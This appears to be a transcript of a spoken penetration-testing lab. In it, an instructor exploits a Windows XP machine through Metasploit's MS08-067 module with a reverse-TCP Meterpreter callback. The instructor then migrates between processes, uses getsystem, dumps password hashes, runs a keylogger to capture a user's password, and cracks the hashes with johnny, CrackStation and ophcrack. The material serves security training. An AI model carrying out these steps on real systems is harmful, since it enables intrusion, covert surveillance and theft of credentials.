So in this lab, we're gonna work on escalating privileges. What we're gonna do here is we're gonna work on stealing passwords and cracking those passwords. Also, we're gonna migrate between processes, from a system level to a user level and back. To get started, we need to open up our Metasploit Framework. From our Metasploit Framework, we're gonna use the same exploit we did last time. So we'll just type in use exploit/windows/smb/ms08_067_netapi. Then we're gonna set our payload, and we're gonna use the Meterpreter payload that we used before, which is windows/meterpreter/reverse_tcp. Now, at this point, we're gonna show our options, and you'll notice that we need to set our RHOST and our LHOST. So we're gonna set our RHOST for our Windows machine. In my case, the IP for that is .56.100, and then I'm gonna set my LHOST to my Kali machine, which in my case is 56.102. Then, I will show my options one more time.
You'll see at this point that I have my Windows machine IP as my RHOST. We're gonna be attacking port 445 with the netapi vulnerability. We're gonna use our payload of Meterpreter, and we're gonna have the callback go back to our Kali machine on port 4444. Now at this point, we're just gonna type in exploit. Just like before, we now have an established connection where we've triggered the vulnerability in the Windows XP machine and it has called back to us with stage two. We have that connection from the Windows machine here to our Kali machine here. Now we're at the Meterpreter prompt, so what do we wanna do? Well, the first thing I want to do is I wanna know what process I am. I'm gonna type in getpid, and it tells me that I'm process 980. To understand what that is, I'm gonna type in ps, which is gonna list all of the running processes on the Windows machine. Here you can see the running processes. Let me expand this just a little bit more for you.
As you can see, process 980 is right here. It's the service host process. That is actually the system-level user, NT AUTHORITY\SYSTEM. Right now, we already have system-level rights on this machine, so there's no need to escalate our privileges, but if we were a lower-level user, we would have to escalate our privileges up. I'm gonna show you some techniques for doing that as well. The reason why we are a system-level user in this case is because the exploit we're doing is against the service host, and the service host is always run as SYSTEM. If instead we used something like a spearphishing campaign, we would end up being brought in as that user, who probably doesn't have admin rights, and we'd have to work our way up. We can still run a lot of those same processes, like hash dumps and password cracking, to start from there and migrate upward. Now that we see what process we're in, let's go ahead and see what system ID we do have. Let's type in getsid. You'll notice that it says we are S-1-5-18.
Anything under 500 is gonna be a system-level type process, whether that's gonna be something like the LOCAL SERVICE or the SYSTEM itself. Once we get into users, they start out at 1000 and go above. If you're the administrator, that's a 500-level account. This last dash number here is gonna tell us a lot about what type of process that is and what type of user we are. Now that we're here, let's go ahead and do our hash dump, and we'll see what other users are on the system. Here we go. We have the Administrator account. Again, that's that SID 500. We have a Guest, which is SID 501. We have the HelpAssistant, which starts at 1000. The John Sim user is user 1003. Then we have this SUPPORT account, which is 1002. What I'm gonna do is I'm just gonna copy all of this text here, and we're gonna put it into a text file, and we're gonna save that to our desktop. To do that, I'm just gonna open the Terminal here.
I'm gonna type in gedit, which is a graphical text editor, and we can just paste that in. Then we're gonna go ahead and save it to the Desktop so we'll know where it is. We'll just call that hashdump. At this point, we can close that out and we can close out that one. Now we have a text file with that information so we can use that in our password cracking. Before we get to that, I'm gonna still play with Meterpreter a little bit more here first and show you some other things. One of the things I talked about before is that we can do a migration from one process to another. That should change us into that user. For instance, right now, we are in process 980, which is this NT AUTHORITY\SYSTEM. Now, if I wanted to become John Sim, for instance, the user on this machine, because if I start running things as SYSTEM, like the Notepad, that would look suspicious, but if I did it as John Sim, it wouldn't.
I'm gonna go ahead and change myself into this one right here, which is process 1248, and that should change me into John Sim, who has a SID of 1003. What we're gonna do is just type in migrate and the PID we wanna go to, which in this case is 1248. So, migrate to 1248. You'll see that we're migrating from 980 to 1248. It takes a couple seconds. Now we should be loaded into that process. It says we're complete. Let's get PID and make sure that we are in the process we wanted. Getpid, we verified we are in 1248. Now if I do ps, you can see that 1248 is a process owned by John Sim. Let's get our SID and verify that. It should tell us that we're SID 1003, because that's John Sim's SID. In this case, we do have SID 1003, which is John Sim. That's how you can migrate from one user to another and one process to another. Why else might you wanna migrate processes?
Well, we'll talk about covering our tracks later, but one of the things we wanna do to cover our tracks is to migrate between processes. For instance, if we did a vulnerability, such as an Internet Explorer exploit, Internet Explorer tends to crash a lot. If the process I'm sitting in crashes, I'm gonna lose my access. If I break in through Internet Explorer, I'm gonna want to migrate to something more stable and more hidden, such as the service host account or the services.exe or explorer.exe, because they're a lot more stable and they don't crash as often. Now, the other thing to know is why might I wanna go to a user that's not System or Admin? Like in this case, John Sim's a regular user. Why would I wanna migrate into him? Well, one of the reasons why I might wanna do that is if I wanted to do key logging. If I wanted to key log John Sim, I have to be logged in as John Sim.
In this case, I now am John Sim, so I can start my key logger and capture those keystrokes. We talked about this before, but I'll go ahead and show that to you now because, again, this is another way to escalate our privileges. If John happens to have admin rights and he's on his user account daily and then types in his password to elevate into an admin status, like he installed a new printer or something like that, we'd be able to capture that password. Let me bring up the key logger commands here again, just to remind us. We'll go up here to Help, and we have our keyscan_start, keyscan_stop, and again, our keyscan_dump to get those keystrokes. Let's go ahead and start it by doing keyscan_start. If I go here and do a keyscan_start, and now John Sim is on his machine. Let's say he was opening up a Notepad and typing in his passwords. Here's my email address and my password of P@$$w0rd. Then he decides, you know, that's really not a secure way to save my passwords.
I'm gonna go ahead and delete those. He just gets rid of that, never had any evidence. Well, we happened to capture it because we were capturing his keystrokes. Right here, you can see it. He pressed Return, he did Password List, hit Return, typed in that, hit Return, and then P@$$w0rd. Why might this be useful? Well, if I had my key scanner going the whole time and I'm capturing all this data, I can capture his side of all conversations. All his instant messages, all his emails, all his usernames and passwords. All this information is stuff that I can use to elevate my permissions and spread laterally into other systems. I might now have his usernames and passwords for his banking, his Facebook, his Twitter, all of that stuff, because we captured all those keystrokes. It's a pretty cool technique. Now, going back to our escalating privileges, we're still sitting here as John Sim as the user. The next thing we wanna look at is migrating back to SYSTEM, and we'll go ahead and do that.
We'll just do a ps, so we can figure out what process we wanna go to, and we can go ahead and migrate ourselves into 980 again, just like we were before, and go back to SYSTEM. We'll just migrate 980. Again, that's gonna move us back, and at this point, we should now be the system-level user. We'll do that getpid. We're in 980. Getsid, we're back to the system-level user, which is that -18. One other thing I'll show you. We're gonna go back to John Sim here one more time 'cause I forgot to show this to you. We'll go back to his PID, which was 1248. Now we're back here. You can see that we are user 1003, again that's John Sim. Another way to get SYSTEM is actually using the command getsystem, and it's part of Meterpreter. If you just type in getsystem, it will go ahead and move and get you system-level access. Now, if I get my SID, I am back here as the system level. Now, let's see what process it put us in.
We're still in John's process, but we are the system user now. That's something else that you can look at here. It's an interesting technique and it works most of the time. Now, the time this won't work is if you are some low-level account that's below a user. If we look up here in the process list, you'll see that there's this LOCAL SERVICE account, for instance. This isn't even a user account. This is below user. All it does is local services. This happens to be for the sound drivers in my system. You also have this NETWORK SERVICE. These processes have such low-level access, you can't migrate back into John or back into SYSTEM because you're too low a level at that point. The only way to break back into this is actually to exit out of the system and then re-exploit the system.
Be careful where you jump to, because if you have system- or domain-level rights and you go down to a standard user to do something like a keystroke, depending on that user's level of access, you can actually get yourself stuck in that user and you're gonna be done at that point. That's why being able to have their password to be able to log in as them is very important. That's where our hashdump came in. If you remember, we had run the hashdump command and we got all of these hashes. What I ended up doing with them is I put them in this text file. What we're gonna do is we're gonna use a program called johnny. Under Applications, we'll go into Password Attacks and click on johnny. Now from johnny, we're gonna Open a password file. The file we're gonna open is on our desktop and it's called hashdump. That was the file that we put the text in. As we go through it, it immediately starts and it starts going through the attack for us.
It's gonna try to crack any of the passwords it can find based on the hashes. Here, you see Administrator was already cracked as PASSWORD, and it's working on John Sim. So far, it doesn't know what the first part is, but it got the last two letters, which is H-O. Now, this is doing a brute force attack. This can take a long time as it tries to crack things if they're not real words. In the case of John Sim, this actually says DOCTORWHO. The first part of it is gonna be DOCTOR with a W at the end. That's not a real word, so it's gonna take a long time for it to go through and do its cracking. Now, something that'll be a lot quicker is for us to go to something like CrackStation on the Internet. Let's go ahead and I'll show you how that works with John Sim here. When we created our Kali machine, we didn't allow copy and pasting from Kali back to our desktop environment. I'm gonna have to actually type that in. It's cdd3ae5197aa40cc477a180ba53335e6.
Then we're gonna go ahead and put in the code over here, which, Diesel LION, is what it looks like, and then crack the hash. You'll see how quickly it's gonna come back with CrackStation. It comes back immediately and it gives us lots of different choices of what it thinks it could be based on the fact that we have that particular hash. Now, why are there multiple things that it could be based on this hash? The reason why we have this duplication is there's actually repetition in the hash tables. One of the reasons for that is that LM hashes only support 14 characters. Anything over 14 characters, what it does is it breaks them in half, seven letters and seven letters, hashes each part and then goes again. In our case, you'll see the fact that we have this doctorWoodland, DOCTORWHOWEBGUIDE, doctorwhowebguide, and if you hash any of these, it goes back to the same hash. Now, what does this tell us? Because now we're like, oh, which one do we choose?
Well, if we go back to our Jack the Ripper, if you remember, we ended up having, if we count the letters, D-O-C-T-O-R-W. That is the first seven. Notice that all of these first seven are the same, doctorw. That's gonna give us the first seven letters guaranteed. Well, the nice thing was we had already found the last two letters were H-O. We could figure out now, it's doctor, W-H-O, DOCTORWHO. Then we can use that as the password to get it. There's a little bit of work here required, and again, eventually, johnny is gonna go through and crack it all for us, but it hasn't been able to do it yet. Now, there's one more program here that we can use. In fact, there's lots of different programs we can use for password cracking. Another one that's really good is ophcrack. Now, ophcrack does require you to have an Internet connection so you can download the tables, because if you don't have the tables, it's not really effective.
If you go into this area where Table Selection is and you click Install, you'll be able to install the tables once you download them to your system, but we're gonna have to connect the Kali box to the Internet first to do that. Now, where do you get those tables from? Well, if you click on Help, it'll tell you exactly where to go. You can go to ophcrack.sourceforge.net and there is a bunch of tables that they have for you, including the XP free, XP free fast, and Vista free fast rainbow tables. If you want other tables, they do sell those, but they do have a cost to them. Since we're using an XP machine, we can download the XP free small or XP free fast to try to do this rainbow cracking on your own, and see how much more effective it is than doing the methods we just saw. Again, going through CrackStation, all the tables are already loaded and it's very quick and easy for you to get those passwords.